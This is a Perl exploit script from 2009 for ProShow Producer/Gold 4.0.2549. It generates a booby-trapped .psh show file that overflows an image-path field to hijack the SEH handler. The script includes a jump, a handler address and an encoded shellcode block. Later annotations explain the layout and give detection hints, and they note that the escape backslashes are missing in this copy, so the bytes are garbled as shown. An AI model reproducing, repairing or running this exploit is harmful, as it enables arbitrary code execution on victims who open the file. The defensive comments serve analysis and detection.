
# Title : ProShow Producer / Gold 4.0.2549 (.psh) Universal BOF Exploit (SEH)
# Published : 2009-08-25
# Author : hack4love


#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH
##########################################################################
##http://files.photodex.com/release/psgold_40_2549.exe
##http://files.photodex.com/release/pspro_40_2549.exe
###########################################################################
##THIS EXPLOIT WORKS WELL FOR BOTH PROGRAMS###############################
###########################################################################
##FIRST WAS BY corelanc0d3r################################################
###########################################################################
# Leading part of the generated ProShow show (.psh) file: a long run of
# key=value settings concatenated into a single string.
# NOTE(review): as rendered on this page every line terminator appears as a
# bare "n", so this listing is not a byte-accurate copy of the original
# script; do not build file signatures from it verbatim.
# The last field, cell[0].images[0].image, has no terminator. The print
# statement further down appends $bof and the other pieces directly after it,
# so the oversized data ends up inside that image-path value.
# Detection note: an image-path value in a .psh file that runs to several
# kilobytes, or that contains non-printable bytes, is anomalous for a path.
my $header="Photodex(R) ProShow(TM) Show File Version=0n".
"proshowVersion=2549n".
"title=Untitled ProShow 1n".
"fileName=proshowsploit.pshn".
"description=''n".
"showAspect=1n".
"showSizeX=16n".
"showSizeY=9n".
"loop=1n".
"loopRestart=1n".
"displaySizeX=704n".
"displaySizeY=528n".
"videoSizeX=720n".
"videoSizeY=480n".
"videoFrameRate=29970n".
"videoBitRate=1120000n".
"videoMuxBitRate=1394400n".
"outputImageSizeX=1024n".
"outputImageSizeY=768n".
"outputQuality=80n".
"toolbarEnable=1n".
"allowQuit=1n".
"allowPlay=1n".
"allowTime=1n".
"allowRestart=1n".
"allowSave=1n".
"allowSaveAll=1n".
"allowPrint=1n".
"allowPrintAll=1n".
"allowCopy=1n".
"allowSaver=1n".
"allowCta=1n".
"ctaLabel=ProShow Infon".
"ctaURL=http://www.photodex.com/n".
"background=1n".
"bgOutlineColor=0n".
"bgSizeMode=1n".
"bgColorizeColor=8421504n".
"waterOpacity=128n".
"waterZoom=10000n".
"waterColorizeColor=8421504n".
"musicVolumeOffset=100n".
"defaultCellVolumeOffset=100n".
"defaultCellFadeIn=100n".
"defaultCellFadeOut=100n".
"defaultMusicVolumeOffset=50n".
"defaultMusicFadeIn=100n".
"defaultMusicFadeOut=100n".
"maxDispWidth=800n".
"maxDispHeight=600n".
"maxRender=1n".
"maxRenderWidth=800n".
"maxRenderHeight=600n".
"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFFn".
"makeFileLocalFolder=c:/n".
"cells=2n".
"cell[0].imageEnable=1n".
"cell[0].nrOfImages=1n".
# Left open on purpose of the file layout: no terminator follows this value.
"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
####################################################################################
# Pieces appended to the unterminated image-path value, in the order used by
# the print statement: $bof, $nsh, $seh, $nop, then $sec.
# NOTE(review): the string escapes in this listing appear without their
# backslashes, so as rendered these are literal text, not byte values.
# Per the title this is an SEH-based stack overflow. Overwrites of this kind
# are what SafeSEH, SEHOP and DEP are designed to stop; whether the 4.0.2549
# binaries opt in to any of them is not shown on this page.

# Filler repeated 6151 times; presumably the distance to the exception
# record in the affected build (not verifiable from this page).
my $bof="x41" x 6151;
# Four-byte value placed immediately before $seh; presumably the
# next-record field of the overwritten exception registration entry.
my $nsh="xEBx06x90x90";
# Four-byte value the author labels "Universal"; presumably the handler
# address (TODO confirm which module it belongs to).
my $seh="xf9x4cx1ax10";####Universal ##if.dnt
# Twenty bytes of padding placed between $seh and $sec.
my $nop="x90" x 20;
# Payload bytes appended after the $nop padding.
# The page does not state what this payload does, and that cannot be
# determined from the listing alone; it would have to be characterised in an
# isolated analysis environment.
my $sec=
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc2".
"xf8x23x02x83xebxfcxe2xf4x3ex10x67x02xc2xf8xa8x47".
"xfex73x5fx07xbaxf9xccx89x8dxe0xa8x5dxe2xf9xc8x4b".
"x49xccxa8x03x2cxc9xe3x9bx6ex7cxe3x76xc5x39xe9x0f".
"xc3x3axc8xf6xf9xacx07x06xb7x1dxa8x5dxe6xf9xc8x64".
"x49xf4x68x89x9dxe4x22xe9x49xe4xa8x03x29x71x7fx26".
"xc6x3bx12xc2xa6x73x63x32x47x38x5bx0ex49xb8x2fx89".
"xb2xe4x8ex89xaaxf0xc8x0bx49x78x93x02xc2xf8xa8x6a".
"xfexa7x12xf4xa2xaexaaxfax41x38x58x52xaax08xa9x06".
"x9dx90xbbxfcx48xf6x74xfdx25x9bx42x6exa1xf8x23x02";
###############################################################################
# Trailing part of the generated .psh file: the remaining cell[0] settings,
# all of cell[1], and the closing modifierCount field.
# The string opens with a terminator, which ends the oversized
# cell[0].images[0].image line once the print statement has appended the
# other pieces to it. cell[1]'s image value is an ordinary short path, so
# only the cell[0] image field carries the abnormal length.
my $header2 = "ncell[0].images[0].imageEnable=1n".
"cell[0].images[0].name=Abstract_02n".
"cell[0].images[0].replaceableTemplate=1n".
"cell[0].images[0].sizeMode=1n".
"cell[0].images[0].colorizeColor=8421504n".
"cell[0].images[0].colorizeStrength=10000n".
"cell[0].images[0].outlineColor=16777215n".
"cell[0].images[0].aspectX=4n".
"cell[0].images[0].aspectY=3n".
"cell[0].images[0].videoVolume=100n".
"cell[0].images[0].objectId=1n".
"cell[0].images[0].videoSpeed=100n".
"cell[0].images[0].nrOfKeyframes=2n".
"cell[0].images[0].keyframes[0].timeSegment=1n".
"cell[0].images[0].keyframes[0].attributeMask=-1n".
"cell[0].images[0].keyframes[0].zoomX=10000n".
"cell[0].images[0].keyframes[0].zoomY=10000n".
"cell[0].images[0].keyframes[0].panAccelType=1n".
"cell[0].images[0].keyframes[0].zoomXAccelType=1n".
"cell[0].images[0].keyframes[0].zoomYAccelType=1n".
"cell[0].images[0].keyframes[0].rotationAccelType=1n".
"cell[0].images[0].keyframes[0].motionSmoothness=-1n".
"cell[0].images[0].keyframes[0].lockAR=1n".
"cell[0].images[0].keyframes[0].transparency=0n".
"cell[0].images[0].keyframes[0].colorizeColor=8421504n".
"cell[0].images[0].keyframes[0].colorizeStrength=10000n".
"cell[0].images[0].keyframes[0].shadowOffsetX=70n".
"cell[0].images[0].keyframes[0].shadowOffsetY=70n".
"cell[0].images[0].keyframes[1].timestamp=10000n".
"cell[0].images[0].keyframes[1].timeSegment=3n".
"cell[0].images[0].keyframes[1].segmentTimestamp=10000n".
"cell[0].images[0].keyframes[1].attributeMask=-1n".
"cell[0].images[0].keyframes[1].zoomX=10000n".
"cell[0].images[0].keyframes[1].zoomY=10000n".
"cell[0].images[0].keyframes[1].panAccelType=1n".
"cell[0].images[0].keyframes[1].zoomXAccelType=1n".
"cell[0].images[0].keyframes[1].zoomYAccelType=1n".
"cell[0].images[0].keyframes[1].rotationAccelType=1n".
"cell[0].images[0].keyframes[1].motionSmoothness=-1n".
"cell[0].images[0].keyframes[1].lockAR=1n".
"cell[0].images[0].keyframes[1].transparency=0n".
"cell[0].images[0].keyframes[1].colorizeColor=8421504n".
"cell[0].images[0].keyframes[1].colorizeStrength=10000n".
"cell[0].images[0].keyframes[1].shadowOffsetX=70n".
"cell[0].images[0].keyframes[1].shadowOffsetY=70n".
"cell[0].background=1n".
"cell[0].bgDefault=1n".
"cell[0].bgSizeMode=1n".
"cell[0].bgColorizeColor=8421504n".
"cell[0].sound.useDefault=1n".
"cell[0].sound.volume=100n".
"cell[0].sound.fadeIn=100n".
"cell[0].sound.fadeOut=100n".
"cell[0].sound.async=1n".
"cell[0].sound.musicUseDefault=1n".
"cell[0].sound.musicVolume=50n".
"cell[0].sound.musicFadeIn=100n".
"cell[0].sound.musicFadeOut=100n".
"cell[0].musicVolumeOffset=50n".
"cell[0].time=3000n".
"cell[0].transId=2n".
"cell[0].transTime=3000n".
"cell[0].includeGlobalCaptions=1n".
"cell[1].imageEnable=1n".
"cell[1].nrOfImages=1n".
"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpgn".
"cell[1].images[0].imageEnable=1n".
"cell[1].images[0].name=Abstract_01n".
"cell[1].images[0].replaceableTemplate=1n".
"cell[1].images[0].sizeMode=1n".
"cell[1].images[0].colorizeColor=8421504n".
"cell[1].images[0].colorizeStrength=10000n".
"cell[1].images[0].outlineColor=16777215n".
"cell[1].images[0].aspectX=4n".
"cell[1].images[0].aspectY=3n".
"cell[1].images[0].videoVolume=100n".
"cell[1].images[0].objectId=2n".
"cell[1].images[0].videoSpeed=100n".
"cell[1].images[0].nrOfKeyframes=2n".
"cell[1].images[0].keyframes[0].timeSegment=1n".
"cell[1].images[0].keyframes[0].attributeMask=-1n".
"cell[1].images[0].keyframes[0].zoomX=10000n".
"cell[1].images[0].keyframes[0].zoomY=10000n".
"cell[1].images[0].keyframes[0].panAccelType=1n".
"cell[1].images[0].keyframes[0].zoomXAccelType=1n".
"cell[1].images[0].keyframes[0].zoomYAccelType=1n".
"cell[1].images[0].keyframes[0].rotationAccelType=1n".
"cell[1].images[0].keyframes[0].motionSmoothness=-1n".
"cell[1].images[0].keyframes[0].lockAR=1n".
"cell[1].images[0].keyframes[0].transparency=0n".
"cell[1].images[0].keyframes[0].colorizeColor=8421504n".
"cell[1].images[0].keyframes[0].colorizeStrength=10000n".
"cell[1].images[0].keyframes[0].shadowOffsetX=70n".
"cell[1].images[0].keyframes[0].shadowOffsetY=70n".
"cell[1].images[0].keyframes[1].timestamp=10000n".
"cell[1].images[0].keyframes[1].timeSegment=3n".
"cell[1].images[0].keyframes[1].segmentTimestamp=10000n".
"cell[1].images[0].keyframes[1].attributeMask=-1n".
"cell[1].images[0].keyframes[1].zoomX=10000n".
"cell[1].images[0].keyframes[1].zoomY=10000n".
"cell[1].images[0].keyframes[1].panAccelType=1n".
"cell[1].images[0].keyframes[1].zoomXAccelType=1n".
"cell[1].images[0].keyframes[1].zoomYAccelType=1n".
"cell[1].images[0].keyframes[1].rotationAccelType=1n".
"cell[1].images[0].keyframes[1].motionSmoothness=-1n".
"cell[1].images[0].keyframes[1].lockAR=1n".
"cell[1].images[0].keyframes[1].transparency=0n".
"cell[1].images[0].keyframes[1].colorizeColor=8421504n".
"cell[1].images[0].keyframes[1].colorizeStrength=10000n".
"cell[1].images[0].keyframes[1].shadowOffsetX=70n".
"cell[1].images[0].keyframes[1].shadowOffsetY=70n".
"cell[1].background=1n".
"cell[1].bgDefault=1n".
"cell[1].bgSizeMode=1n".
"cell[1].bgColorizeColor=8421504n".
"cell[1].sound.useDefault=1n".
"cell[1].sound.volume=100n".
"cell[1].sound.fadeIn=100n".
"cell[1].sound.fadeOut=100n".
"cell[1].sound.async=1n".
"cell[1].sound.musicUseDefault=1n".
"cell[1].sound.musicVolume=50n".
"cell[1].sound.musicFadeIn=100n".
"cell[1].sound.musicFadeOut=100n".
"cell[1].musicVolumeOffset=50n".
"cell[1].time=3000n".
"cell[1].transId=2n".
"cell[1].transTime=3000n".
"cell[1].includeGlobalCaptions=1n".
"modifierCount=0n";
# Write the assembled file content to standard output.
print $header.$bof.$nsh.$seh.$nop.$sec.$header2;
################################################################################
###################################################################
# Append the same content to HACK4LOVE.psh in the current working directory.
# NOTE(review): the open uses a bareword handle with the mode embedded in the
# file-name string, its result is not checked, and the handle is never
# explicitly closed.
# The fixed output name is a usable file-name indicator for this specific
# proof of concept, though it is trivially changed.
open(myfile,'>> HACK4LOVE.psh');
print myfile $header.$bof.$nsh.$seh.$nop.$sec.$header2;
##################################################################
